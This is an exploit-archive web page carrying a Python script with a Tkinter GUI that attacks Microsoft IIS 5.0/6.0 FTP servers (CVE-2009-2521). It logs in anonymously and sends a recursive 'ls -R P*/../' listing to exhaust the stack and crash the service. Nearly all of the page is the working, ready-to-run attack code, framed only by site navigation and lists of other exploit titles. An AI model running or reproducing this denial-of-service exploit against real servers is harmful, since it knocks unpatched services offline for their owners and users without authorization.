首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service
来源:https://twitter.com/D35m0nd142 作者:D35m0nd142 发布时间:2012-10-10  
#!/usr/bin/python
# Exploit Title: Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION]
# Exploit Author: D35m0nd142 
# Date: 03/10/2012
# Vendor Homepage: http://www.iis.net/
# Tested on Ubuntu 12.04
# CVE: 2009-2521
# Special thanks to Kingcope 

from socket import *
import sys
import Tkinter 
import time

def exploit():
	sock=socket(AF_INET,SOCK_STREAM)
	ip1=ip.get()
	port1=port.get()
	username="ftp"
	passwd="[email protected]"
	sock.connect((ip1,port1))
	sock.send("user %s\r\n" %username)
	print "[+]" + sock.recv(1024)
	sock.send("pass %s\r\n" %passwd)
	print "[+]" + sock.recv(1024)
	command="ls -R P*/../"
	sock.send("%s\r\n" %command)
	print sock.recv(1024)
	sock.close()
	time.sleep(2)
	exploited=Tkinter.Label(text="[+] Exploit sent [+]",bg="blue",fg="green").pack()		

root=Tkinter.Tk()
root.title("* Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service *")
root['bg']="black"
ip_text=Tkinter.Label(text="IP Address :").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
port_text=Tkinter.Label(text="Port :").pack()
port=Tkinter.IntVar()
port_entry=Tkinter.Entry(textvariable=port).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
author=Tkinter.Label(text="Author: D35m0nd142 | https://twitter.com/D35m0nd142").pack(side='bottom')
root.mainloop()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dart Communications Stack Over
·Hiro Player 1.6.0 (.mp3) Local
·Microsoft Office Excel 2003 St
·Avaya WinPMD UniteHostRouter B
·Windows Escalate UAC Protectio
·Avaya IP Office Customer Call
·QNX QCONN Remote Command Execu
·PLIB 1.8.5 ssg/ssgParser.cxx B
·InduSoft Web Studio Arbitrary
·Gom Player 2.1.44.5123 (Unicod
·NCMedia Sound Editor Pro 7.5.1
·FL Studio 10 Producer Edition
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved